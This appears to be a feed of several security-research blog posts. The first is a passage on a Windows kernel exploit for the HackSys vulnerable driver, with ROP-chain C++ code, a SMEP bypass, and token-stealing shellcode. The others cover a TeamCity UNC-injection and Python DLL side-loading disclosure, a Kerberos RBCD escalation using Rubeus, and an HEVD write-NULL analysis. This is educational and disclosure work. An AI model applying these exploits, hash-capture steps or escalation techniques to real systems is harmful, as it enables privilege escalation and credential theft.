After mov esp, 0x48000000instruction execution, we notice that it crashed and returned a segmentation fault as an exception named UNEXPECTED_KERNEL_MODE_TRAP (7F), now let’s see our stack.

Stack frame after crash

So, what can we do next?

Memory and Components

Now this blogpost can really start. After all briefing covering the techniques, it’s time to explain why stack is one of the most confuse things in a exploitation development, we will see how it can easily turn a simple vulnerability attack into a brain-death issue.

Kernel Memory Management

An oversimplification of how a kernel connects application software to the hardware of a computer (wikipedia)

Now, we’ll have to go deep into Memory Managment topic as way to understand concepts about Memory Segments, Virtual Allocation, and Paging.

According to Wikipedia

The kernel has full access to the system’s memory and must allow processes to safely access this memory as they require it. Often the first step in doing this is virtual addressing, usually achieved by paging and/or segmentation. Virtual addressing allows the kernel to make a given physical address appear to be another address, the virtual address.
In computing, a virtual address space (VAS) or address space is the set of ranges of virtual addresses that an operating system makes available to a process.[1] The range of virtual addresses usually starts at a low address and can extend to the highest address allowed by the computer’s instruction set architecture and supported by the operating system’s pointer size implementation, which can be 4 bytes for 32-bit or 8 bytes for 64-bit OS versions. This provides several benefits, one of which is security through process isolation assuming each process is given a separate address space.

As we can see, Virtual Addressing refers to the space addressedfor each user-application and kernel functions, reserving memory spaces during a OS usage. When an application is initialized, the operation system understand that needs to allocate new space in memory, addressing into a valid range of addresses, consequently avoiding damaging kernel current memory region.

That’s the case when you try toplay a game, and for some reason, a bunch of GB’s from your current memory increasesbefore the game starts, all data was allocated and most of this dataand addresses initiates nullified until game file-data starts to be loaded into memory.

With the use of malloc() and VirtualAlloc() functions, you can actually “address” a range of Virtual Memory into a defined address, that’s why Stack Pivoting is the best solution for make this exploit works.

Virtual Memory

Address difference betwen physical/virtual memory

As you can see in the above image, Virtual Addresses communicates to application/processby sending data and values, so the processes can be able to query, allocateor freeeach data any time.

As Wikipedia says:

In computing, virtual memory, or virtual storage,[b] is a memory management technique that provides an “idealized abstractionof the storage resources that are actually available on a given machine”[3] which “creates the illusionto users of a very large (main) memory”.[4]
The computer’s operating system, using a combination of hardwareand software, maps memory addresses used by a program, called virtual addresses, into physical addresses in computer memory. Main storage, as seen by a process or task, appears as a contiguous address space or collection of contiguous segments. The operating system manages virtual address spaces and the assignment of real memory to virtual memory.[5] Address translation hardware in the CPU, often referred to as a Memory Management Unit (MMU), automatically translates virtual addresses to physical addresses. Softwarewithin the operating system may extend these capabilities, utilizing, e.g., disk storage, to provide a virtual address space that can exceed the capacity of real memory and thus reference more memory than is physicallypresent in the computer.
The primary benefits of virtual memory include freeingapplications from having to manage a shared memory space, ability to share memory used by libraries betweenprocesses, increased security due to memory isolation, and being able to conceptually use more memory than might be physicallyavailable, using the technique of pagingor segmentation.

As mentioned before, addressing/allocating Virtual Memory ranges (from a user-land perspective), allow us to manipulate de usage of addresses data into our current application, but that’s a problem. When an address range of Virtual Memory is allocated, still not part of OS physical operations due the abstracted/fake allocation into memory. Following the idea of our previous example, when a gamestarts, Virtual Memory is allocated and Memory Management Unit (MMU) automatically traslate data between physical and virtualaddresses.

From a developer perspective, when an application consumes memory, it’s important to free()/VirtualFree() unused data, to preventdata won’t crashthe whole application, once so many addresses are set to be in use by the system. Also, OS can deal with processes which consumes many addresses, automatically closing this ones avoidingcritical errors. There cases that applications exceed the capacity of RAM free space, in this situations, the allocation can be extended into Disk Storage.

Paged Memory

Physical memory also called Paged Memory, imply to memory which is in use by applications and processes. This memory scheme can retrivedata from Virtual Allocations, consequently utilizing it data as part of current execution.

According to Wikipedia:

Memory Paging

In computer operating systems, memory paging (or swappingon some Unix-like systems) is a memory management scheme by which a computer stores and retrieves data from secondary storage[a] for use in main memory.[citation needed] In this scheme, the operating system retrieves data from secondary storage in same-size blocks called pages. Pagingis an important part of virtual memory implementations in modern operating systems, using secondary storage to let programs exceed the size of available physical memory.

Page faults

When a process tries to reference a page not currently mapped to a page frame in RAM, the processor treats this invalid memory reference as a page fault and transfers control from the program to the operating system.

Page Table

A page table is the data structure used by a virtual memory system in a computer operating system tostore the mapping between virtual addresses and physical addresses. Virtual addresses are used by the program executed by the accessing process, while physical addresses are used by the hardware, or more specifically, by the Random-Access Memory (RAM) subsystem. The page table is a key component of virtual address translation that is necessary to access data in memory.

Kernel can identifies when an address lies in a Paged Memoryspace by utilizing Page Table Entry (PTE) , which differs each type of allocation and mapping memory segments.

With Page Table Entry (PTE), Kernel is able to map the correct offset in order to translatedata between each address. If there’s a invalid mapped memory region in the translations, a Page Fault is returned, and OS crashes. In case of Windows Kernel, a _KTRAP_FRAME is called, and an error should be expected as bellow:

Stack Frame after exploit execution

Virtual Allocation issues in Windows System

When a binary exploit is developed, memory must to be manipulate in most of the cases. Through C/C++ functions as VirtualAlloc(), if you manage to allocate data into address 0x48000000with size 0x1000, your current address 0x48000000are now “addressed” into Page Table as a Virtual Address until 0x48001000 and it will NOT be treat as part of Physical Memory by Kernel (remains as Non-Paged one). It’s important to pay attention in this detail thus if you try to use the example above in a Kernel-Landperspective, a Trap Frame will be handled by WinDBGas follows:

Trying to use Virtual Memory in Kernel scheme cause _KTRAP_FRAME

To deal with this issue, we can use VirtualLock()function from C/C++once it locks the specified region of the process’s virtual address space into physical memory, thus preveting Page Faults. So, with that in mind, we can now changes our Virtual Memory Addressto a Physicalone.

Now should be possible to achieve code execution, right?

// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
// Mapping address to Physical Memory <------------
if (VirtualLock(fakeStack, 0x10000)) {
std::cout << "[+] Address Mapped to Physical Memory" << std::endl;
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
return 0;
Calling our Stack Pivoting gadget
Exception from WinDBG

Again, the same error popped out even with address mapped into Physical Memory.

Pain and Suffer due DoubleFaults

After million of tests, with different patterns of memory allocations, i’ve found a solution attempt. According to Martin Mielke and kristal-g, a reserved memory space should be used before the main allocation from address 0x48000000.

Kristal-G explanation about the cause of DoubleFault Exception
0x47fffff70 address being used by StackFrame

When a Trap Frameoccur, we can clearly notice that lower addresses from 0x48000000are used by stack, and if these addresses keeps with unallocated status, they can’t be used by current stack frame.

As you can see, 0x47fffff70is being utilized by ourstack frame, but once we are starting the allocation from 0x48000000address, it won’t be a valid one. To deal with this issue, a reservationmemory before 0x48000000 must be done.

LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000-0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

Now we can actually allocate into 0x48000000–0x1000 address, finally allowing us to ignore DoubleFaultexception.

Let’s run our exploit again, it should works!

TrapFrame from 0x47fffff70 desapeared after memory allocation

No matter how you give a try to manage memory, changing addresses or fill up stackwith datahoping that works well, it will always catchand returns an exceptioneven when your code seems to be correct. it took me a while 3 monthsof rebooting my VM, and trying to change code to understand why it still happening.

Stack vs DATA

Let’s imagine stack frame as a “big ball pit”, and there are located a bunch of data, and when a new ball is “placed” in this space, all the others “changes” their location. That’s exatcly what happens when you tries to manipulate memory, changing current stack to an another one as mov esp, 0x48000000 does. When a modification of current stack frame is done, the same “believes” that current Physical Memory are mappedto another processes, and for some reason, you can actually see things like this after crash.

LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Reserved memory before Stack Pivoting
*(INT64*)(0x48000000 - 0x1000) = 0xDEADBEEFDEADBEEF;
*(INT64*)(0x48000000 - 0x900) = 0xDEADBEEFDEADBEEF;

QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
Crash after mov esp, 0x48000000

After pollute Stack Frame in a reserved space before Stack Pivoting offsetwe can cleary notice that different addresses poped out into our current Stack Frame, but our Trap Frame still remains the same as before 0x47fffe70. If we fill up all stack with 0x41bytes, we’ll notice that some bytes will appear with different values as below:

// Filling up reserved space memory
RtlFillMemory((LPVOID)(0x48000000 - 0x1000), 0x1000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
0x41 bytes into our reserved memory space pops into Stack Frame

With this results in mind, we have some alternatives to considerate for this situation:

  • Increase size of reserved memoryspace.
  • Try to find a fix to the Stack Frame due the situation we actually can’t reserve memory before Stack Pivoting space.

So, let’s give a try at first to increase the space of our reserved memory

// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x5000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Filling up reserved space memory
// Size increased to 0x5000
RtlFillMemory((LPVOID)(0x48000000 - 0x5000), 0x5000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
mov esp, 0x48000000 won’t caught any error, and our RIP register get fowarded into add esp, 0x28
After that, a DoubleFault exception was caught due add esp, 0x28
svchost.exe Crashed when add, esp 0x28 executes

For some reason, after increased our reserved memory before mov esp, 0x48000000, the whole kernel has crashed, and when 0x48000000is moved into our current RSPregister, our stack framechanges to the User Processes Contextdue the size of address it self. That’s why i’ve mentioned before that stack seems to be a “Ball pit” sometimes, and after all, we still getting the same Trap Frame exception.

No matter how you try to manipulate memory, it always will be caught and it will crash some application, after that, WinDBGwill handle it as an exception and BSODyour system in a terrible horror movie.

My experience trying everything that i had, to pass through this exception

Breakpoints??…. ooohh!…. Breakpoints!!!!

INT3, a.k.a 0xCCand breakpoints, can be defined as a signalfor any debbugerto catchand stop an execution of attached processesor a current development code. It can be performed by “clicking” into a debug option in some part of an IDE UIor by insertingINT3instruction directly into target process through0xCC opcode. So, in a WinDBGcommand line, a command named bp still available to breakpointaddresses as follow:

// Common Breakpoint, just stop into this address before it runs
bp 0x48000000

// Conditional Breakpoint, stop when r12 register is not equal to 1337
// if not equal, changes current r12 value to 0x1337
// if equal, changes r12 reg value with r13 one
bp 0x48000000 ".if( @r12 != 0x1337) { r12=1337 }.else { r12=r13 }"


Also, it’s possible to enjoy the use of this mechanism to breakpointa shellcode, and see if it code is running correctly during a exploitation development phase.

BYTE sc[256] = {
0xcc, // <--- We send a debbuger signal and stop it execution
// before code execution
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff

According to Wikipedia:

The INT3 instruction is a one-byte-instruction defined for use by debuggers to temporarily replacean instruction in a running program in order to set a code breakpoint. The more general INT XXh instructions are encoded using two bytes. This makes them unsuitable for use in patching instructions (which can be one byte long); see SIGTRAP.
The opcode for INT3 is 0xCC, as opposed to the opcode for INT immediate8, which is 0xCD immediate8. Since the dedicated 0xCC opcode has some desired special properties for debugging, which are not shared by the normal two-byte opcode for an INT3, assemblers do not normally generate the generic 0xCD 0x03 opcode from mnemonics.

After an explanation about breakpoints, it’s important to note that every previous tests are made withbreakpointsin order to develop our exploit, but it’s time to forget it and skip all INT3 instructions.

Let’s give a try to re-run our exploit without the needing of breakpointa thing.

cmd.exe opens and no crashes are caught

Kernel won’t crashes anymore, and system memory still intact!

Now shellcodeis being executed after our SMEPbypass through theROP chainand we’re now able to spawn a NT AUTHORITY\SYSTEMshell.


BAAAM!! Finally!!!! aNT AUTHORITY\SYSTEMshell after all!

Breakpoints…. HAHA!! BREAKPOINTS!

So, now we can pay attention that breakpointsalso can be a dangerous thing into a exploitation development.

The explanation about this issue seems to be very simple. When WinDBG debbuger catchesan exceptionfrom kernel, Operation Systemgets a signal that something went wrong occurred, but when a Stack Manipulation is being doing, everythingthat you do is an exception. The Operation Systemdon’t understand that “an attacker is trying to manipulate Stack”, he just catchand rebootit self because the Stackare different from your current kernel context.

This headhache occurs likeStructured Exception Handling (SEH)vulnerabilities, once when the set of breakpointsand even a debbugerinto a process, can cause crashes or unitilizationof the same.

In my case, a away to pass through exceptionis by ignoring all breakpoints, and let kernel don’t reboot with a Non-Criticalexception.

Final Considerations

With this blogpost, i’ve learned alot of content that i didn’t knew before starting to write. It was a fun experience and extreme technical (specially for me), it took me 2 days to write about a thing which cost me 3 months long! you should probably had 10 minutes read, which is awesome and makes me happy too!

It’s important to note that most of this blogpost are deep explaining about memory itself, and trying to showing off how as an attacker is possible to improve our way to deal with troubles, looking around for all possibilities which can help us to achieve our goals, in that caseNT AUTHORITY\SYSTEM shell.

Beware of Stackand Breakpoints, this things can be a headache sometimes, and you will NEVER know until you think about changes your attack methodoly.

Thanks to the people who helped me along all this way:

  • First of all, thanks to my husband who holded me on, when I got myself stressed, with no clue what to do, and with alot of nightmares along all this months!
  • @xct_de
  • @gal_kristal
  • @33y0re

Hope you enjoyed!

Exploit Link (not so important at all)


A case of DLL Side Loading from UNC via Windows environmental variable

5 July 2022 at 15:51

About a month ago I decided to take a look at JetBrains TeamCity, as I wanted to learn more about CVE-2022-25263 (an authenticated OS Command Injection in the Agent Push functionality).

Initially I just wanted to find the affected feature and test the mitigation put in place, eventually I ended up searching for other interesting behaviors that could be considered security issues- and came across something I believed was a vulnerability, however upon disclosure the vendor convinced me that the situation was considered normal in TeamCity's context and its thread model. Since the feature I was testing allowed me to set some of the environmental variables later passed to the given builder step process (in my case it was python.exe).

During that process I accidently discovered that Python on Windows can be used to side-load an arbitrary DLL named rsaenh.dll, placed in a directory named system32, located in a directory pointed by the SystemRoot environment variable passed to the process (it loads %SystemRoot%/system32/rsaenh.dll).

For the purpose of testing, I installed TeamCity on Windows 10 64-bit, with default settings, setting both the TeamCity Server and the TeamCity Build Agent to run as a regular user (which is the default setting).

I used the same system for both the TeamCity Server and the Build Agent.
First, as admin, I created a sample project with one build step of type Python.
I installed Python3 (python3.10 from the Microsoft App Store, checked the box to get it added to the PATH), so the agent would be compatible to run the build. I also created a hello world python build script:

From that point I switched to a regular user account, which was not allowed to define or edit build steps, but only to trigger them, with the ability to control custom build parameters (including some environmental variables).

I came across two separate instances of UNC path injection, allowing me to attack the Build Agent. In both cases I could make the system connect via SMB to the share of my choosing (allowing me to capture the NTLM hash, so I could try to crack it offline or SMB-relay it).

In case of build steps utilizing python, it also turned out possible to load an arbitrary DLL file from the share I set up with smbd hosted from the KALI box.

The local IP address of the Windows system was I ran a KALI Linux box in the same network, under

Injecting UNC to capture the hash / NTLM-relay

On the KALI box, I ran responder with default settings, like this:

Then, before running the build, I set the parameter to \\\pub:

I also ran Procmon and set up a filter to catch any events with the "Path" attribute containing "".
I clicked "Run Build", which resulted in the UNC path being read by the service, as shown in the screenshot below:

Responder successfully caught the hash (multiple times):

I noticed that the was validated and eventually it would not be used to attempt to load the build script (which was what I was trying to achieve in the first place by tampering with it), and the application fell back on the default value C:\TeamCity\buildAgent\work\2b35ac7e0452d98f when running the build. Still, before validation, the service interacted with the share, which I believe should not be the case.

Injecting UNC to load arbitrary DLL

I discovered I could attack the Build Agent by poisoning environmental variables the same way as I attacked the server, via build parameter customization.
Since my build step used python, I played with it a bit to see if I could influence the way it loads DLLs by changing environmental variables. It turned out I could.

Python on Windows can be used to side-load an arbitrary DLL named rsaenh.dll, placed in a directory named system32, located in a directory pointed by the SystemRoot environment variable passed to the process.

For example, by setting the SystemRoot environmental variable to "\\\pub" (from the default "C:\WINDOWS" value):

In case of python3.10.exe, this resulted in the python executable trying to load \\\pub\system32\rsaenh.dll:

With Responder running, just like in case of attacking the TeamCity Server, hashes were captured:

However, since python3.10 looked eager to load a DLL from a path that could be controlled with the SystemRoot variable, I decided to spin up an SMB share with public anonymous access and provide a copy of the original rsaenh.dll file into the pub\system32\ directory shared with SMB.
I used the following /etc/samba/smb.config:


workgroup = WORKGROUP
log file = /var/log/samba/log.%m
max log size = 1000
logging = file
panic action = /usr/share/samba/panic-action %d
server role = standalone server
map to guest = bad user
comment = some useful files
read only = no
path = /home/pub
guest ok = yes
create mask = 0777
directory mask = 0777

I stopped Responder to free up the 445 port, I started smbd:

service smbd start

Then, I ran the build again, and had the python3.10 executable successfully load and execute the DLL from my share, demonstrating a vector of RCE on the Build Agent:

Not an issue from TeamCity perspective

About a week after reporting the issue to the vendor, I received a response, clarifying that any user having access to TeamCity is considered to have access to all build agent systems, therefore code execution on any build agent system, triggered from low-privileged user in TeamCity, does not violate any security boundaries. They also provided an example of an earlier, very similar submission, and the clarification that was given upon its closure (with a nice code injection vector via perl environmental variable).

python loading rsaenh.dll following the SystemRoot env variable

The fact that python used an environmental variable to load a DLL is an interesting occurrence on its own, as it could be used locally as an evasive technique alternative to rundll32.exe (, - to inject malicious code into a process created from an original, signed python3.10.exe executable .


The following code was used to build the DLL. It simply grabs the current username and current process command line, and appends them to a text file named poc.txt. Whenever DllMain is executed, for whatever reason, the poc.txt file will be appended with a line containing those details:

First, let's try to get it loaded without any signatures, locally:

Procmon output watching for any events with Path ending with "rsaenh.dll":

The poc.txt file was created in the current directory of  C:\Users\ewilded\HACKING\SHELLING\research\cmd.exe\python3_side_loading_via_SystemRoot while running python:

Similar cases

There must be more cases of popular software using environmental variables to locate some of the shared libraries they load.

To perform such a search dynamically, all executables in the scope directory could be iterated through and executed multiple times, each time testing arbitrary values set to individual common environmental variables like %SystemRoot% or %WINDIR%. This alone would be a good approach for starters, but it would definitely not provide an exhaustive coverage - most of the places in code those load attempts happen are not reachable without hitting proper command lines, specific to each executable.

A more exhaustive, and but also demanding approach, would be static analysis of all PE files in the scope that simply indicate the usage of both LoadLibrary and GetEnv functions (e..g LoadLibraryExW() and _wgetenv(), as python3.10.exe does) in their import tables.

Exploiting RBCD Using a Normal User Account*

By: tiraniddo
14 May 2022 at 02:29

* Caveats apply.

Resource Based Constrained Delegate (RBCD) privilege escalation, described by Elad Shamir in the "Wagging the Dog" blog post is a devious way of exploiting Kerberos to elevate privileged on a local  Windows machine. All it requires is write access to local computer's domain account to modify the msDS-AllowedToActOnBehalfOfOtherIdentity LDAP attribute to add another account's SID. You can then use that account with the Services For User (S4U) protocols to get a Kerberos service ticket for the local machine as any user on the domain including local administrators. From there you can create a new service or whatever else you need to do.

The key is how you write to the LDAP server under the local computer's domain account. There's been various approaches usually abusing authentication relay. For example, I described one relay vector which abused DCOM. Someone else has then put this together in a turnkey tool, KrbRelayUp

One additional criteria for this to work is having access to another computer account to perform the attack. Well this isn't strictly true, there's the Shadow Credentials attack which allows you to reuse the same local computer account, but in general you need a computer account you control. Normally this isn't a problem, as the DC allows normal users to create new computer accounts up to a limit set by the domain's ms-DS-MachineAccountQuota attribute value. This attribute defaults to 10, but an administrator could set it to 0 and block the attack, which is probably recommend.

But I wondered why this wouldn't work as a normal user. The msDS-AllowedToActOnBehalfOfOtherIdentity attribute just needs the SID for the account to be allowed to delegate to the computer. Why can't we just add the user's SID and perform the S4U dance? To give us the best chance I'll assume we have knowledge of a user's password, how you get this is entirely up to you. Running the attack through Rubeus shows our problem.

PS C:\> Rubeus.exe s4u /user:charlie /domain:domain.local /dc:primarydc.domain.local /rc4:79bf93c9501b151506adc21ba0397b33 /impersonateuser:Administrator /msdsspn:cifs/WIN10TEST.domain.local

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
[*] Action: S4U
[*] Using rc4_hmac hash: 79bf93c9501b151506adc21ba0397b33
[*] Building AS-REQ (w/ preauth) for: 'domain.local\charlie'
[*] Using domain controller:
[+] TGT request successful!
[*] base64(ticket.kirbi):
[*] Action: S4U
[*] Building S4U2self request for: '[email protected]'
[*] Using domain controller: primarydc.domain.local (
[*] Sending S4U2self request to
[X] S4U2Self failed, unable to perform S4U2Proxy.

We don't even get past the first S4U2Self stage of the attack, it fails with a KDC_ERR_S_PRINCIPAL_UNKNOWN error. This error typically indicates the KDC doesn't know what encryption key to use for the generated ticket. If you add an SPN to the user's account however it all succeeds. This would imply it's not a problem with a user account per-se, but instead just a problem of the KDC not being able to select the correct key.

Technically speaking there should be no reason that the KDC couldn't use the user's long term key if you requested a ticket for their UPN, but it doesn't (contrary to an argument I had on /r/netsec the other day with someone who was adamant that SPN's are a convenience, not a fundamental requirement of Kerberos). 

So what to do? There is a way of getting a ticket encrypted for a UPN by using the User 2 User (U2U) extension. Would this work here? Looking at the Rubeus code it seems requesting a U2U S4U2Self ticket is supported, but the parameters are not set for the S4U attack. Let's set those parameters to request a U2U ticket and see if it works.

[+] S4U2self success!
[*] Got a TGS for 'Administrator' to '[email protected]'
[*] base64(ticket.kirbi): doIF...bGll

[*] Impersonating user 'Administrator' to target SPN 'cifs/WIN10TEST.domain.local'
[*] Building S4U2proxy request for service: 'cifs/WIN10TEST.domain.local'
[*] Using domain controller: primarydc.domain.local (
[*] Sending S4U2proxy request to domain controller

Okay, we're getting closer. The S4U2Self request was successful, unfortunately the S4U2Proxy request was not, failing with a KDC_ERR_BADOPTION error. After a bit of playing around this is almost certainly because the KDC can't decrypt the ticket sent in the S4U2Proxy request. It'll try the user's long term key, but that will obviously fail. I tried to see if I could send the user's TGT with the request (in addition to the S4U2Self service ticket) but it still failed. Is this not going to be possible?

Thinking about this a bit more, I wondered, could I decrypt the S4U2Self ticket and then encrypt with the long term key I already know for the user? Technically speaking this would create a valid Kerberos ticket, however it wouldn't create a valid PAC. This is because the PAC contains a Server Signature which is a HMAC of the PAC using the key used to encrypt the ticket. The KDC checks this to ensure the PAC hasn't been modified or put into a new ticket, and if it's incorrect it'll fail the request.

As we know the key, we could just update this value. However, the Server Signature is protected by the KDC Signature which is a HMAC keyed with the KDC's own key. We don't know this key and so we can't update this second signature to match the modified Server Signature. Looks like we're stuck.

Still, what would happen if the user's long term key happened to match the TGT session key we used to encrypt the S4U2Self ticket? It's pretty unlikely to happen by chance, but with knowledge of the user's password we could conceivably change the user's password on the DC between the S4U2Self and the S4U2Proxy requests so that when submitting the ticket the KDC can decrypt it and perhaps we can successfully get the delegated ticket.

As we know the TGT's session key, one obvious approach would be to "crack" the hash value back to a valid Unicode password. For AES keys I think this is going to be difficult and even if successful could be time consuming. However, RC4 keys are just a MD4 hash with no additional protection against brute force cracking. Fortunately the code in Rubeus defaults to requesting an RC4 session key for the TGT, and MS have yet to disable RC4 by default in Windows domains. This seems like it might be doable, even if it takes a long time. We would also need the "cracked" password to be valid per the domain's password policy which adds extra complications.

However, I recalled when playing with the SAM RPC APIs that there is a SamrChangePasswordUser method which will change a user's password to an arbitrary NT hash. The only requirement is knowledge of the existing NT hash and we can set any new NT hash we like. This doesn't need to honor the password policy, except for the minimum age setting. We don't even need to deal with how to call the RPC API correctly as the SAM DLL exports the SamiChangePasswordUser API which does all the hard work. 

I took some example C# code written by Vincent Le Toux and plugged that into Rubeus at the correct point, passing the current TGT's session key as the new NT hash. Let's see if it works:

SamConnect OK
SamrOpenDomain OK
rid is 1208
SamOpenUser OK
SamiChangePasswordUser OK

[*] Impersonating user 'Administrator' to target SPN 'cifs/WIN10TEST.domain.local'
[*] Building S4U2proxy request for service: 'cifs/WIN10TEST.domain.local'
[*] Using domain controller: primarydc.domain.local (
[*] Sending S4U2proxy request to domain controller
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/WIN10TEST.domain.local':

And it does! Now the caveats:

  • This will obviously only work if RC4 is still enabled on the domain. 
  • You will need the user's password or NT hash. I couldn't think of a way of doing this with only a valid TGT.
  • The user is sacrificial, it might be hard to login using a password afterwards. If you can't immediately reset the password due to the domain's policy the user might be completely broken. 
  • It's not very silent, but that's not my problem.
  • You're probably better to just do the shadow credentials attack, if PKINIT is enabled.
As I'm feeling lazy I'm not going to provide the changes to Rubeus. Except for the call to SamiChangePasswordUser all the code is already there to perform the attack, it just needs to be wired up. I'm sure they'd welcome the addition.

HackSys Extreme Vulnerable Driver — Arbitrary Write NULL (New Solution)

18 November 2021 at 19:23

HackSys Extreme Vulnerable Driver — Arbitrary Write NULL (New Solution)

A simple (not stealth) method utilizing NtQuerySystemInformation for Arbitrary Write NULL vulnerabilities

Today, we’re going to have a deep looking through an interesting exploitation technique using NtQuerySystemInformationsystem call in order to achieve a LPE - (Local Privilege Escalation) through HEVD - (Hacksys Extreme Vulnerable Driver). The follow content will only show about possibilities (but unreliable) techniques and methodologies on how to exploit a specify vulnerability typed Arbitrary Write NULL in most of vulnerable x86drivers (in case you doesn’t have certain tools in order to exploit them). Also, we’ll not cover how to install and configure kernel debugging or HEVD IOCLT communication, and all content from this write-up lies behind what should be done to work around with a view to get a LPE.Hope everyone enjoy! =)


First of all, we need to talk about what is Arbitrary Write NULL vulnerability, and at kernel perspective, what should be possible to do with it in order to achieve LPE in our simple cmd.exe session from ring3 (user-land).

In short, Arbitrary Write NULL is most like Arbitrary Write vulnerabilities, the difference behind them, is that the first one allows you to be able to write->[0x00000000] in whatever address/pointer you looking for, and the second one, allows you to define explicitly Write-What-Where, allowing things like write->[0xdeadbeef], meaning that you have control over value of an address/pointer which will be overflowed with 0xdeadbeef, instead only 0x00000000. At below we are going to have a looking deep in to HEVD driver vulnerable function, dissect and understand what is happening.


TriggerWriteNULL function which handle kernel user-buffer, and check if it resides in ring3 (user-land).
Source-code of vulnerable driver function

As you can see here, ifdef SECURE (which is not), probeForWrite() function should verify and confirm that our user input buffer is located at ring3, otherwise our input buffer with be nullified without properly security checks.

Reversing Engineering vulnerable function

As commented, [edi] register is been overflowed with 0x00000000 by [ebx] register as occurs when compiled code wasn’t defined with #ifdef SECURE bit set.

